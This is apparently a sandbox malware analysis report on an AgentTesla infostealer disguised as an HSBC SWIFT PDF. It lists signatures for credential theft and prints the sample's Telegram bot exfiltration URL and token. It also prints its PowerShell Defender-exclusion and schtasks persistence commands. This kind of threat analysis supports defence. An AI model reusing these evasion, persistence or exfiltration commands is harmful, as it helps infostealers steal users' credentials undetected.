Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

27/12/2022, 14:34 UTC

221227-rxqn8afa54 10

27/12/2022, 14:34 UTC

221227-rxfh9afa52 10

25/12/2022, 11:46 UTC

221225-nxcwksee8w 10

Analysis

  • max time kernel
    107s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/12/2022, 14:34 UTC

General

  • Target

    HSBC_Swift_Copy.pdf.exe

  • Size

    1001KB

  • MD5

    ce3718f0a5cd81530496e4724857b0cb

  • SHA1

    17aca36e82674bd55a48684acc4eef6cd02696b1

  • SHA256

    980572025579ff98c1ab84aa8c0c045e075d174bc5bb166e2694590c98f90a54

  • SHA512

    6f30e90a5b9412a24f9513690cfca60c57f2e615604a12ddb7e355bd80894b7f3a37d8242813c76484a258db588c3df25f193a556284c3408d98c92ae814f724

  • SSDEEP

    12288:bZ+2iN1/Sr+pGrnU9xmh873NdbE9QJKQZdF+LHZnbNFphh26mdOAH8c+9epf+mDG:Q1e+gnU9cOrjEw5Zupbxhh26mlH80q

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TBcRbJIkEv.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3476
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBcRbJIkEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp33D1.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:4332
    • C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe
      "C:\Users\Admin\AppData\Local\Temp\HSBC_Swift_Copy.pdf.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • outlook_office_path
      • outlook_win_path
      PID:3572

Network

  • flag-unknown
    DNS
    api.telegram.org
    HSBC_Swift_Copy.pdf.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-unknown
    POST
    https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocument
    HSBC_Swift_Copy.pdf.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dae81ff95e2d27
    Host: api.telegram.org
    Content-Length: 2480
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 27 Dec 2022 14:35:27 GMT
    Content-Type: application/json
    Content-Length: 642
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • 149.154.167.220:443
    https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocument
    tls, http
    HSBC_Swift_Copy.pdf.exe
    6.2kB
    7.5kB
    13
    14

    HTTP Request

    POST https://api.telegram.org/bot5934477911:AAFE-T4zPYFg9j3dne3DNo28zBQV6eiIuEY/sendDocument

    HTTP Response

    200
  • 104.80.225.205:443
    322 B
    7
  • 8.8.8.8:53
    api.telegram.org
    dns
    HSBC_Swift_Copy.pdf.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    030729b2d3fa022e40f33d5d5a39ce69

    SHA1

    64344c92ae83ed42691308c85e6ac18ab1a95b50

    SHA256

    9e829c2d9ac8db2a6ebefec18f0a0a3b27b39bc9f922ff76974bafdbd6c8d48a

    SHA512

    c2f3bee56e2b3084a7fbfd167dfc7c71017524584de708a65e5b3e13c8dbd706cda20f626364bdaaa8dff4895be3234ce54a0e7eebec01dc420fe55c52492d48

  • C:\Users\Admin\AppData\Local\Temp\tmp33D1.tmp

    Filesize

    1KB

    MD5

    74d17675f3975357b9f073e1fed9b1ce

    SHA1

    74caf25e45c8f137ed084d8818770134ca935529

    SHA256

    49acc39059c024d117a38bf3ea598d9ff2005e65c629a31ade6761bf6c38ef54

    SHA512

    ced074d7c83449a175514c502c1fb8d9d541f11b040fa9164ec9a05b6496720291b01f655c4803b3babf71d2b4ff9f00fc20fd44f705d6242a1f84d886783404

  • memory/2732-133-0x0000000005420000-0x00000000059C4000-memory.dmp

    Filesize

    5.6MB

  • memory/2732-134-0x0000000004F10000-0x0000000004FA2000-memory.dmp

    Filesize

    584KB

  • memory/2732-135-0x0000000002A00000-0x0000000002A0A000-memory.dmp

    Filesize

    40KB

  • memory/2732-136-0x0000000007910000-0x00000000079AC000-memory.dmp

    Filesize

    624KB

  • memory/2732-132-0x0000000000500000-0x0000000000600000-memory.dmp

    Filesize

    1024KB

  • memory/3476-158-0x0000000007360000-0x000000000737A000-memory.dmp

    Filesize

    104KB

  • memory/3476-157-0x0000000007250000-0x000000000725E000-memory.dmp

    Filesize

    56KB

  • memory/3476-149-0x0000000006CB0000-0x0000000006CE2000-memory.dmp

    Filesize

    200KB

  • memory/3476-144-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

  • memory/3476-156-0x00000000072A0000-0x0000000007336000-memory.dmp

    Filesize

    600KB

  • memory/3476-153-0x0000000007660000-0x0000000007CDA000-memory.dmp

    Filesize

    6.5MB

  • memory/3476-151-0x0000000006C90000-0x0000000006CAE000-memory.dmp

    Filesize

    120KB

  • memory/3476-150-0x0000000070C40000-0x0000000070C8C000-memory.dmp

    Filesize

    304KB

  • memory/3572-147-0x0000000000400000-0x0000000000430000-memory.dmp

    Filesize

    192KB

  • memory/3572-162-0x00000000070E0000-0x0000000007130000-memory.dmp

    Filesize

    320KB

  • memory/4048-145-0x0000000005B90000-0x0000000005BF6000-memory.dmp

    Filesize

    408KB

  • memory/4048-143-0x0000000005340000-0x0000000005362000-memory.dmp

    Filesize

    136KB

  • memory/4048-154-0x0000000007620000-0x000000000763A000-memory.dmp

    Filesize

    104KB

  • memory/4048-155-0x0000000007690000-0x000000000769A000-memory.dmp

    Filesize

    40KB

  • memory/4048-148-0x0000000006310000-0x000000000632E000-memory.dmp

    Filesize

    120KB

  • memory/4048-141-0x0000000005480000-0x0000000005AA8000-memory.dmp

    Filesize

    6.2MB

  • memory/4048-140-0x0000000004D60000-0x0000000004D96000-memory.dmp

    Filesize

    216KB

  • memory/4048-159-0x0000000007940000-0x0000000007948000-memory.dmp

    Filesize

    32KB

  • memory/4048-152-0x0000000070C40000-0x0000000070C8C000-memory.dmp

    Filesize

    304KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.